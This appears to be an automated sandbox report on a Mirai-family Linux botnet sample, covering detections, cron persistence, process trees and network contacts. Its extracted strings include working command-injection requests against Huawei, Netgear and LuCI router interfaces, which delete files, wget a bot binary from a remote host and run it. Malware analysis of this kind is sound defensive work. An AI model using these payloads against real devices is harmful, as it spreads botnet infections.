Edit tour

Linux Analysis Report
spim.elf

Overview

General Information

Sample name:spim.elf
Analysis ID:1642633
MD5:c2575dcc05d235fdba210f99feadb1d9
SHA1:825241b59ae56c543490da9da9d5713c5b5c7bc0
SHA256:77127ae9b28ce4a505666410fc5aa343d7b3cd4dc77ec07da5c6737fe75a5fcb
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:88
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
HTTP GET or POST without a user agent
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1642633
Start date and time:2025-03-19 09:17:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:spim.elf
Detection:MAL
Classification:mal88.troj.linELF@0/2@1/0
  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: conn.masjesu.zip
Command:/tmp/spim.elf
PID:6232
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:no crontab for root
  • system is lnxubuntu20
  • spim.elf (PID: 6232, Parent: 6152, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/spim.elf
    • spim.elf New Fork (PID: 6234, Parent: 6232)
      • spim.elf New Fork (PID: 6236, Parent: 6234)
      • sh (PID: 6236, Parent: 6234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l"
        • sh New Fork (PID: 6238, Parent: 6236)
        • crontab (PID: 6238, Parent: 6236, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • spim.elf New Fork (PID: 6239, Parent: 6234)
      • sh (PID: 6239, Parent: 6234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -"
        • sh New Fork (PID: 6241, Parent: 6239)
        • crontab (PID: 6241, Parent: 6239, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • spim.elf New Fork (PID: 6242, Parent: 6232)
      • spim.elf New Fork (PID: 6244, Parent: 6242)
      • spim.elf New Fork (PID: 6246, Parent: 6242)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
spim.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    spim.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      spim.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: spim.elfAvira: detected
        Source: spim.elfReversingLabs: Detection: 44%
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 37.44.238.92Connection: close
        Source: /tmp/spim.elf (PID: 6242)Reads hosts file: /etc/hostsJump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 37.44.238.92Connection: close
        Source: global trafficDNS traffic detected: DNS query: conn.masjesu.zip
        Source: spim.elfString found in binary or memory: http://purenetworks.com/HNAP1/
        Source: spim.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: spim.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51780
        Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/huawei -r /spim;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/huawei -r /spim;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /UD/act?1 HTTP/1.1
        Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
        Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s/l7vmra;sh${IFS}/tmp/l7vmra&>r&&tar${IFS}/string.js HTTP/1.0
        Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/spim;${IFS}sh${IFS}/var/tmp/spim
        Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
        Source: Initial samplePotential command found: GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F%s%2Fbins.sh%3B%20chmod%20777%20bins.sh%3B%20.%2Fbins.sh) HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/spim;${IFS}sh${IFS}/var/tmp/spimGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmraGET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F%s%2Fbins.sh%3B%20chmod%20777%20bins.sh%3B%20.%2Fbins.sh) HTTP/1.1
        Source: Initial samplePotential command found: GET /.shell HTTP/1.1
        Source: Initial samplePotential command found: GET / HTTP/1.1
        Source: classification engineClassification label: mal88.troj.linELF@0/2@1/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 6238)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
        Source: /bin/sh (PID: 6241)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
        Source: /usr/bin/crontab (PID: 6241)File: /var/spool/cron/crontabs/tmp.nUQDM6Jump to behavior
        Source: /usr/bin/crontab (PID: 6241)File: /var/spool/cron/crontabs/rootJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1582/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/3088/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1579/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1698/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1576/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/2302/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/115/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/236/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/116/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/237/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/117/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/118/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/910/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/119/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/912/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/10/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/2307/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/11/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/918/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/12/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/13/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/14/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/6242/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/15/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/16/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/17/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/6247/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/18/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/6246/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1594/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/120/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/121/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1349/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/122/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/243/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/123/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/2/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/124/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/3/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/4/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/125/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/126/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1344/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1465/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1586/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/127/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/6/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/248/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/128/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/249/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1463/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/800/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/9/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/801/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/20/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/21/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1900/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/22/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/23/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/24/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/25/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/26/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/27/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/28/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/29/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/491/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/250/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/130/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/251/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/252/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/132/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/253/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/254/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/255/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/256/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1599/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/257/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1477/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/379/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/258/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1476/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/259/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1475/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/936/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/30/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/2208/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/35/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1809/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/1494/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6244)File opened: /proc/260/cmdlineJump to behavior
        Source: /tmp/spim.elf (PID: 6236)Shell command executed: sh -c "crontab -l"Jump to behavior
        Source: /tmp/spim.elf (PID: 6239)Shell command executed: sh -c "crontab -"Jump to behavior
        Source: submitted sampleStderr: no crontab for root: exit code = 0
        Source: /tmp/spim.elf (PID: 6232)Queries kernel information via 'uname': Jump to behavior
        Source: spim.elf, 6232.1.000055885ae45000.000055885aecc000.rw-.sdmp, spim.elf, 6234.1.000055885ae45000.000055885aecc000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
        Source: spim.elf, 6232.1.000055885ae45000.000055885aecc000.rw-.sdmp, spim.elf, 6234.1.000055885ae45000.000055885aecc000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: spim.elf, 6232.1.00007fff15d0a000.00007fff15d2b000.rw-.sdmp, spim.elf, 6234.1.00007fff15d0a000.00007fff15d2b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/spim.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/spim.elf
        Source: spim.elf, 6232.1.00007fff15d0a000.00007fff15d2b000.rw-.sdmp, spim.elf, 6234.1.00007fff15d0a000.00007fff15d2b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: spim.elf, type: SAMPLE

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: spim.elf, type: SAMPLE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid Accounts1
        Command and Scripting Interpreter
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        Direct Volume Access1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Scheduled Task/Job
        1
        Scripting
        Boot or Logon Initialization ScriptsRootkitLSASS Memory1
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1642633 Sample: spim.elf Startdate: 19/03/2025 Architecture: LINUX Score: 88 31 109.202.202.202, 80 INIT7CH Switzerland 2->31 33 37.44.238.92, 36120, 443, 51780 HARMONYHOSTING-ASFR France 2->33 35 4 other IPs or domains 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected Mirai 2->41 9 spim.elf 2->9         started        signatures3 process4 process5 11 spim.elf 9->11         started        13 spim.elf 9->13         started        process6 15 spim.elf sh 11->15         started        17 spim.elf sh 11->17         started        19 spim.elf 13->19         started        21 spim.elf 13->21         started        process7 23 sh crontab 15->23         started        27 sh crontab 17->27         started        file8 29 /var/spool/cron/crontabs/tmp.nUQDM6, ASCII 23->29 dropped 43 Sample tries to persist itself using cron 23->43 45 Executes the "crontab" command typically for achieving persistence 23->45 signatures9
        SourceDetectionScannerLabelLink
        spim.elf44%ReversingLabsLinux.Backdoor.Gafgyt
        spim.elf100%AviraEXP/ELF.Agent.J.8
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://37.44.238.92/.shell100%Avira URL Cloudmalware

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        conn.masjesu.zip
        77.90.153.218
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://37.44.238.92/.shellfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/spim.elffalse
            high
            http://purenetworks.com/HNAP1/spim.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/spim.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                54.171.230.55
                unknownUnited States
                16509AMAZON-02USfalse
                37.44.238.92
                unknownFrance
                49434HARMONYHOSTING-ASFRfalse
                109.202.202.202
                unknownSwitzerland
                13030INIT7CHfalse
                91.189.91.43
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                91.189.91.42
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                54.171.230.55GwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                  na.elfGet hashmaliciousPrometeiBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      na.elfGet hashmaliciousPrometeiBrowse
                        na.elfGet hashmaliciousPrometeiBrowse
                          s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                            kaizen.sh4.elfGet hashmaliciousMiraiBrowse
                              sync.x86.elfGet hashmaliciousUnknownBrowse
                                sync.mipsel.elfGet hashmaliciousUnknownBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    37.44.238.92686i.elfGet hashmaliciousMiraiBrowse
                                    • 37.44.238.92/.shell
                                    l7vmra.elfGet hashmaliciousMiraiBrowse
                                    • 37.44.238.92/.shell
                                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                    91.189.91.43sync.mips.elfGet hashmaliciousUnknownBrowse
                                      sync.arm4.elfGet hashmaliciousUnknownBrowse
                                        sync.x86_64.elfGet hashmaliciousUnknownBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            sync.m68k.elfGet hashmaliciousMiraiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                      sync.arm6.elfGet hashmaliciousUnknownBrowse
                                                        91.189.91.42sync.mips.elfGet hashmaliciousUnknownBrowse
                                                          sync.arm4.elfGet hashmaliciousUnknownBrowse
                                                            sync.x86_64.elfGet hashmaliciousUnknownBrowse
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                sync.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                        sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                          sync.arm6.elfGet hashmaliciousUnknownBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            conn.masjesu.zip686i.elfGet hashmaliciousMiraiBrowse
                                                                            • 37.44.238.92
                                                                            l7vmra.elfGet hashmaliciousMiraiBrowse
                                                                            • 77.90.153.218
                                                                            LkUJU0rsxdoNTRjxlZ5e0rZRO3rOY4rKRo.elfGet hashmaliciousMiraiBrowse
                                                                            • 216.126.231.240
                                                                            doQQmLpWCXK3TF48O7pZ2ayjzBZWAPU7nH.elfGet hashmaliciousMiraiBrowse
                                                                            • 87.120.84.230
                                                                            wsaySOikSR3afBEBBbLelehAkQc8MFUcQx.elfGet hashmaliciousMiraiBrowse
                                                                            • 216.126.231.240
                                                                            m1TuocfCMhon01ZDYjxrTEWsmYdVD8FZ4k.elfGet hashmaliciousMiraiBrowse
                                                                            • 216.126.231.240
                                                                            k1l22Z6gKgXPE1tN9Ynyy0WNW15Tg2eA44.elfGet hashmaliciousMiraiBrowse
                                                                            • 216.126.231.240
                                                                            Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfGet hashmaliciousMiraiBrowse
                                                                            • 87.120.84.230
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CANONICAL-ASGBsync.mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            sync.arm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            sync.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 91.189.91.42
                                                                            sync.m68k.elfGet hashmaliciousMiraiBrowse
                                                                            • 91.189.91.42
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 91.189.91.42
                                                                            sync.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.125.190.26
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 91.189.91.42
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 91.189.91.42
                                                                            sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.189.91.42
                                                                            AMAZON-02USRequest for Quotation 2170032137 PDF.exeGet hashmaliciousFormBookBrowse
                                                                            • 52.26.80.133
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 52.212.150.54
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 52.212.150.54
                                                                            bq0WOI4IP84Va7A.bat.exeGet hashmaliciousFormBookBrowse
                                                                            • 13.248.169.48
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 44.247.155.67
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 34.249.145.219
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 44.247.155.67
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 44.247.155.67
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 44.247.155.67
                                                                            miner.elfGet hashmaliciousUnknownBrowse
                                                                            • 34.249.145.219
                                                                            HARMONYHOSTING-ASFR686i.elfGet hashmaliciousMiraiBrowse
                                                                            • 37.44.238.88
                                                                            gigab.arm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 37.44.238.66
                                                                            gigab.mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 37.44.238.66
                                                                            l7vmra.elfGet hashmaliciousMiraiBrowse
                                                                            • 37.44.238.92
                                                                            gigab.mips.elfGet hashmaliciousGafgytBrowse
                                                                            • 37.44.238.66
                                                                            gigab.spc.elfGet hashmaliciousGafgytBrowse
                                                                            • 37.44.238.66
                                                                            gigab.arm5.elfGet hashmaliciousGafgytBrowse
                                                                            • 37.44.238.66
                                                                            gigab.arm4.elfGet hashmaliciousGafgytBrowse
